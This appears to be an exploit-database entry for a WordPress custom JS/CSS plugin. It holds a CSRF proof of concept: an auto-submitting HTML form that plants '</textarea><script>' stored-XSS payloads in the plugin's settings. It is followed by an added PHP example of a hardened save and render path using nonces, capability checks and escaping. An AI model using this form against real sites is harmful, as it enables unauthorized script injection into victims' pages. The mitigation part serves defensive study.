## https://sploitus.com/exploit?id=WPEX-ID:0A0E7BD4-948D-47C9-9219-380BDA9F3034
Make an author (or above role) open the following HTML:
```html
<body onload="document.forms[0].submit()">
<form action="https://example.com/wp-admin/options-general.php?page=custom_js_css" method="post">
<input type="hidden" name="js_adminpanel" value='csrf' />
<input type="hidden" name="js_frontend" value='</textarea><script>alert("frontend_js")</script>' />
<input type="hidden" name="js_login" value='</textarea><script><script>alert("login_js")</script>' />
<input type="hidden" name="css_admin" value='' />
<input type="hidden" name="css_frontend" value='csrf' />
<input type="hidden" name="css_login" value='csrf' />
<input type="submit" name="update" value="Update" />
</form>
</body>
```
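
The form above carries no unpredictable token, and its `</textarea>` prefix is aimed at a settings editor that echoes saved values unescaped. The following is an added example of a hardened save and render path for such a page, not the plugin's own code; the `cjc_` function names, the `cjc_save` nonce action, the `cjc_<field>` option keys and the `manage_options` requirement are assumptions.

```php
<?php
// Added example. Hypothetical names: cjc_* functions, 'cjc_save' nonce action,
// 'cjc_<field>' option keys. Field names and page slug are taken from the form above.
const CJC_FIELDS = array( 'js_adminpanel', 'js_frontend', 'js_login',
                          'css_admin', 'css_frontend', 'css_login' );

function cjc_handle_save() {
    // Only act on POSTs to this settings page.
    if ( ! isset( $_POST['update'], $_GET['page'] ) || 'custom_js_css' !== $_GET['page'] ) {
        return;
    }
    // Capability check (assumption): storing script that runs for every visitor
    // is treated as an administrator-level action.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }
    // CSRF check: dies unless the POST carries a valid nonce for this action.
    // An auto-submitting cross-site form cannot supply one.
    check_admin_referer( 'cjc_save', 'cjc_nonce' );

    foreach ( CJC_FIELDS as $field ) {
        // Values are stored as submitted because the feature is custom JS/CSS;
        // the nonce and capability checks decide who may store them.
        $value = isset( $_POST[ $field ] ) ? wp_unslash( $_POST[ $field ] ) : '';
        update_option( 'cjc_' . $field, (string) $value );
    }
}
add_action( 'admin_init', 'cjc_handle_save' );

function cjc_render_page() {
    echo '<form method="post">';
    wp_nonce_field( 'cjc_save', 'cjc_nonce' ); // hidden nonce + referer fields
    foreach ( CJC_FIELDS as $field ) {
        // esc_textarea() encodes < and >, so a stored "</textarea><script>"
        // is shown as text in the editor instead of closing the element.
        printf(
            '<p><label>%1$s<br><textarea name="%1$s" rows="8" cols="80">%2$s</textarea></label></p>',
            esc_attr( $field ),
            esc_textarea( get_option( 'cjc_' . $field, '' ) )
        );
    }
    submit_button( 'Update', 'primary', 'update' );
    echo '</form>';
}
```

With this in place the form above is rejected at `check_admin_referer()`, and any value already stored is rendered inert in the settings editor by `esc_textarea()`.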